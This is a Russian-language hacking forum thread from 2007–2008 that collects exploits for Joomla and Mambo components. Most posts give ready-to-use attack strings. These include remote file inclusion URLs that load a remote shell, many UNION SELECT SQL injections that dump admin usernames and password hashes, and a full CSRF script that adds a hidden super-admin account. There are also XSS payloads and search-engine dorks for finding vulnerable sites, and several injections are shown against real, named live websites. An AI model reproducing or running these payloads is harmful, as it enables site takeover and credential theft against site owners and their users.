Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Discussion in 'Веб-уязвимости' started by it's my, 6 Oct 2007.

  1. Proxyr

    Proxyr New Member

    Joined:
    9 Jan 2008
    Messages:
    2
    Likes Received:
    2
    Reputations:
    0
    com_serverstat (компонент Mambo & Joomla)
    /Этот компонент используеться для отображения статистики игровых серверов/

    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии шаблона administrator/components/com_serverstat/templates/template.game.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Переменная переданная через GET запрос используеться include. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
    Пример:
    Code:
    http://[host]/administrator/components/com_serverstat/templates/template.game.php?mosConfig_absolute_path=[http://file]
    ...........................................
    а также:
    в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_serverstat/install.serverstat.php
    Пример:
    Code:
    http://[host]/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=[http://file]
     
    #21 Proxyr, 11 Jan 2008
    Last edited: 11 Jan 2008
    1 person likes this.
  2. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    com_serverstat (компонент Mambo & Joomla)
    Ну тогда ещё упомянем, что там есть и активная XSS - В поле ника игрока. Если не хватит символов для полноценной атаки (не помню сколько в ник влазит), то можно закончить ник вот так:
    HTML:
    <!--
    , потом войти ещё одним игроком в игру с ником начинающимся на
    HTML:
    -->
    ну и так далее, до тех пор пока не хватит места...
     
    2 people like this.
  3. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Joomla 1.0.13 CSRF Vulnerability

    PHP:
    <script type="text/javascript">
    window.onload = function() {
    var 
    url "http://joomlasite.com/joomla/administrator/index2.php";
    var 
    gid 25;
    var 
    user 'custom_username';
    var 
    pass 'custom_password';
    var 
    email 'joe_cool (at) example (dot) com [email concealed]';
    var 
    param = {
    nameuser,
    usernameuser,
    emailemail,
    passwordpass,
    password2pass,
    gidgid,
    block0,
    option'com_users',
    task'save',
    sendEmail1
    };
    var 
    form document.createElement('form');
    form.action url;
    form.method 'post';
    form.target 'hidden';
    form.style.display 'none';
    for (var 
    i in param) {
    try {
    // ie
    var input document.createElement('<input name="'+i+'">');
    } catch(
    e) {
    // other browsers
    var input document.createElement('input');
    input.name i;
    }
    input.setAttribute('value'param[i]);
    form.appendChild(input);
    }
    document.body.appendChild(form);
    form.submit();
    }
    </script>
    <iframe name="hidden" style="display: none"></iframe>
    <img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">
    [size=-100]PS добавляет нового админа с заданным логином, пассом и мылом, если кто не понял...[/size]
     
    _________________________
  4. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    JoomlaFlash Component Multiple Remote File Inclusion

    Flash Component Multiple Remote File Inclusion

    Vulnerable: 2.5.1, 2.5.2

    Exploit:

    Code:
    http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_
    flash_uploader.php?mosConfig_absolute_path=shell? 
    
    http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.jooml
    a_flash_uploader.php?mosConfig_absolute_path=shell?
    
     
  5. ХаЬа

    ХаЬа Banned

    Joined:
    18 Jan 2008
    Messages:
    6
    Likes Received:
    7
    Reputations:
    0
    Joomla Component NeoRecruit

    SQL:
    http://[сайт]/index.php?option=com_neorecruit&task=offer_view&id=[SQL инъекция]

    Пример:
    Code:
    http://www.sepangaircraft.com/index.php?option=com_neorecruit&task=offer_view&id=36985
    
    2+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
    
    20,21,22,23,24,25+FROM+jos_users--
    Joomla Component Nice Talk

    SQL:
    http://[сайт]/index.php?option=com_nicetalk&tagid=[SQL инъекция]

    Пример:
    Code:
    http://www.diariometropolitano.com/rmbs/index.php?option=com_nicetalk&tagid=-1)+UNION+
    
    SELECT+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15,16,17,18+FROM+jos_use
    
    rs--

    Joomla перфикс jos_
    Mamba перфикс mos_
     
  6. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Joomla Multiple Remote File Inclusion

    Remote File Inclusion

    Vulnerable: com_panoramic version 1.0

    PoC:

    Code:
    http://localhost/path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=[evilcode]
    
    Remote File Inclusion

    Vulnerable: MOSMediaLite451

    PoC:

    Code:
    http://www.site.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell] 
    http://www.site.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell] 
    http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell] 
    http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell] 
    http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell] 
    http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell]
    
     
    #26 iddqd, 24 Jan 2008
    Last edited: 24 Jan 2008
  7. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    Mambo Component Newsletter (listid) Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
    Для поиска вводим:

    Code:
    allinurl: "com_newsletter"

    Mambo Component Fq (listid) Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
    Для поиска вводим:

    Code:
    allinurl: "com_fq"

    Mambo Component MaMML (listid) Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
    Для поиска вводим:

    Code:
    allinurl: "com_mamml"

    Mambo Component Glossary 2.0 (catid) SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users-
    Для поиска вводим:

    Code:
    allinurl: "com_glossary"
    (c)
     
    1 person likes this.
  8. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    Mambo Component musepoes (aid) Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*
    Для поиска вводим:

    Code:
    allinurl: "com_musepoes"

    Mambo Component buslicense (aid) Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_buslicense&sectionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/*
    Для поиска вводим:

    Code:
    allinurl: "com_buslicense"

    Mambo Component Recipes 1.00 (id) Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*
    Для поиска вводим:

    Code:
    allinurl: "com_recipes"

    Mambo Component jokes 1.0 (cat) SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
    Для поиска вводим:

    Code:
    allinurl: "com_jokes"

    Mambo Component EstateAgent 0.1 Remote SQL Injection

    SQL Injection:

    Code:
    index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN
    Для поиска вводим:

    Code:
    allinurl: "com_estateagent"
    (c)
     
    2 people like this.
  9. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Component Catalogshop 1.0b1 SQL Injection Vulnerability

    inurl: index.php?option=com_catalogshop
    Инъекция:
    Code:
    index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
    http://www.uralmetall.com/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
    Component AkoGallery 2.5b SQL Injection Vulnerability

    inurl: index.php?option=com_akogallery
    Инъекция:
    Code:
    index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mos_users--
    http://brodnica.com.pl/powiat/index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mos_users--
    (с) hackturkiye.com
     
    1 person likes this.
  10. Mr. P.S.

    Mr. P.S. Elder - Старейшина

    Joined:
    27 May 2007
    Messages:
    179
    Likes Received:
    296
    Reputations:
    35
    SQL-инъекция в Mambo Component Restaurant

    Программа: Mambo Component Restaurant 1.0

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Пример:
    Code:
    index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/* */union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/* */from/**/mos_users/*
    (c)
     
    #30 Mr. P.S., 1 Feb 2008
    Last edited: 1 Feb 2008
    3 people like this.
  11. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    скуль в Garyґs Cookbook 2.3.4 другие версии не смотрел

    google: inurl:eek:ption inurl:com_garyscookbook (всего 251,000 )

    POST http://localhost/joomla/index.php HTTP/1.0
    Accept: */*
    Referer: http://localhost/joomla/index.php?option=com_garyscookbook&Itemid=&func=detail&id=1
    Accept-Language: en-us
    Content-Type: application/x-www-form-urlencoded
    Proxy-Connection: Keep-Alive
    User-Agent: Opera 9.95
    Host: localhost
    Content-Length: 95
    Pragma: no-cache

    option=com_garyscookbook&Itemid=&func=vote&imgvote=4&id=1,(select username from %23__users where gid=25 or gid=24 limit 1))%23


    запрос к бд
    INSERT INTO jos_gkb_voting_log (type,date,userid,fileid,ipaddress) VALUES ('3','2008-00-00 00:00:00', 0,[sql],'127.0.0.1');

    результаты запроса нигде не отоброжаются
    единственный способ эксплуатации посимвольный перебор
    p.s. шыпко геморойно дальше не стал ковырять, если у кого получется добавить insert или update плиз отпишытесь
     
    1 person likes this.
  12. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Component NeoReferences 1.3.1 (catid) SQL Injection Vulnerability

    inurl: index.php?option=com_neoreferences
    Инъекция:
    Code:
    index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    http://www.islamicamagazine.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    Mambo Component Mambads 1.5 Remote SQL Injection
    inurl: index.php?option=com_mambads
    Инъекция:
    Code:
    index.php?option=com_mambads&Itemid=0&func=detail&cacat=0&casb=0&caid=100500+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(username,0x3a,password),null,null,null,null,null,null,null+from+mos_users--
    http://www.vivalavida.org/index.php?option=com_mambads&Itemid=0&func=detail&cacat=0&casb=0&caid=100500+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(username,0x3a,password),null,null,null,null,null,null,null+from+mos_users--
    (c) hackturkiye.com
     
    #32 it's my, 1 Feb 2008
    Last edited: 8 Feb 2008
    2 people like this.
  13. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Mambo Component SOBI2 RC 2.5.3 SQL Injection Vulnerability

    PoC:

    Code:
    http://site.com/path/index.php?option=com_sobi2&Itemid=27&catid=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*
    
     
  14. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    Mosets Hot Property v0.9.6

    magic_quotes_gpc off
    register_globals on

    HTML:
    http://localhost/joomla/components/com_hotproperty/pdf.php?id=10'+and+1=0+union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(username,0x3a,password),1+from+%23__users+where+gid=25+or+gid=24+limit+1/*
     
    #34 chekist, 3 Feb 2008
    Last edited: 6 Dec 2008
  15. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability


    Code:
    /index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*
    Поиск бажного компонента: inurl:index.php?option=com_directory
    Автор: aNa TrYaGi
    Источник: milw0rm.com [2008-02-03]
     
  16. Mr. P.S.

    Mr. P.S. Elder - Старейшина

    Joined:
    27 May 2007
    Messages:
    179
    Likes Received:
    296
    Reputations:
    35
    Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit

    Автор: SoSo H H (Iraqi-Cracker)
    Tested on: Markplace Version 1.1.1 and 1.1.1-pl1
    Поиск бажного компонента:
    "Marketplace Version 1.1.1"
    "Marketplace Version 1.1.1-pl1"
    inurl:index.php?option=com_marketplace
    Exploit:
    Code:
    index.php?option=com_marketplace&page=show_category&catid=(SQL)
    Пример:
    Code:
    (SQL)=-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*
    milw0rm.com [2008-02-03]



    ----------------------------------------------------
    HOME : http://www.hackturkiye.com/
    AUTHOR : S@BUN :
    joomla SQL Injection(com_awesom)

    DORKS 1: allinurl :"com_awesom"
    EXPLOIT:
    Code:
    index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*
    Code:
    <name>Awesom</name>
    <creationDate>24/05/2004</creationDate>
    <author>Madd0</author>
    <copyright>This component is released under the GNU/GPL License</copyright>
    <authorEmail>[email protected]</authorEmail>
    
    <authorUrl>amazoop.sourceforge.net</authorUrl>
    <version>0.3.2</version>
    <description>Awesom!, or Amazon Web Services for Opensource Mambo, is a component that lets you create lists of products to feature on your Mambo-driven site.<br />
    These lists can be customized or can be automatically generated with information provided by Amazon through Amazon Web Services.<br />
    Additionally, if you are an Amazon associate, you can configure Awesom to link to Amazon 
    using your associate ID in order to earn comissions.
    </description>
    milw0rm

    joomla SQL Injection(com_shambo2)

    DORKS 1: allinurl :"com_shambo2"
    EXPLOIT:
    Code:
    index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users
    milw0rm

    joomla SQL Injection(com_downloads)(filecatid)

    DORKS 1: allinurl :"com_downloads"filecatid
    EXPLOIT:
    Code:
    index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
    milw0rm

    Joomla Component Ynews 1.0.0

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Пример:
    Code:
    /index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1/* */union/**/select/**/0,1,2,username,password,5,6%20from%20jos_users/*
    xakep.ru
     
    #36 Mr. P.S., 4 Feb 2008
    Last edited: 7 Feb 2008
  17. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Component Ynews 1.0.0 SQL Injection Vulnerability

    inurl: index.php?option=com_ynews
    Инъекция:
    Code:
    index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password),null,5,6+from+jos_users/*
    http://www.newpowersoul.de/index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password),null,5,6+from+jos_users/*
    (c) milw0rm.com
     
    1 person likes this.
  18. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Component PeopleBook 1.1.6 Passiv XSS

    inurl: index.php?option=com_peoplebook
    Инъекция:
    Code:
    /index.php?option=com_peoplebook&Itemid=661&func=searchstaff&Itemid=661&field=name&term=%22%3E%3Cscript%3Ealert(document.coockie)%3C/script%3E&submit=Go&search_status=%25&search_category=%25
    http://www.fln.org/index.php?option=com_peoplebook&Itemid=661&func=searchstaff&Itemid=661&field=name&term=%22%3E%3Cscript%3Ealert(document.coockie)%3C/script%3E&submit=Go&search_status=%25&search_category=%25
    примечание: XSS'ка работает, только при условии если в компоненте включен поиск.

    (c) it's my


    Добавлено 08.02.2008
    ----------------------
    А вот это не знаю, что такое, но точно Активная XSS
    Code:
    http://www.pan-group.com/mambo4.6/index.php?option=com_guest&option=com_guest&task=show&pageid=1
    Еще Пасивная XSS в компоненте Quote:
    Code:
    http://www.hlconveyancing.com/index.php?option=com_quote&task=instructUs&Itemid=49
    во всех полях вводим "><script>alert(document.coockie)</script>
    Component com_noticias 1.0 SQL Injection

    inurl: index.php?option=com_noticias
    Инъекция:
    Code:
    index.php?option=com_noticias&Itemid=999999&task=detalhe&id=-1+union+select+0,null,concat(username,0x3a,password),3,4,5+from+jos_users/*
    http://www.cm-stirso.pt/index.php?option=com_noticias&Itemid=999999&task=detalhe&id=-1+union+select+0,null,concat(username,0x3a,password),3,4,5+from+jos_users/*
    (c) zone-turk.net
     
    #38 it's my, 7 Feb 2008
    Last edited: 8 Feb 2008
  19. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    SQL Injection

    Mambo Component com_gallery Remote SQL Injection Vulnerability


    Code:
    EXPLOIT 1 :
    
    index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*
    
    
    EXPLOİT 2 :
    
    index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users
    

    SQL Injection

    Joomla Component NeoGallery 1.1 SQL Injection Vulnerability

    Code:
    EXPLOIT :
    
    index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users
    milw0rm.com
     
  20. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Mambo SQL Injection (com_comments)

    Code:
    index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1
    http://www.milw0rm.com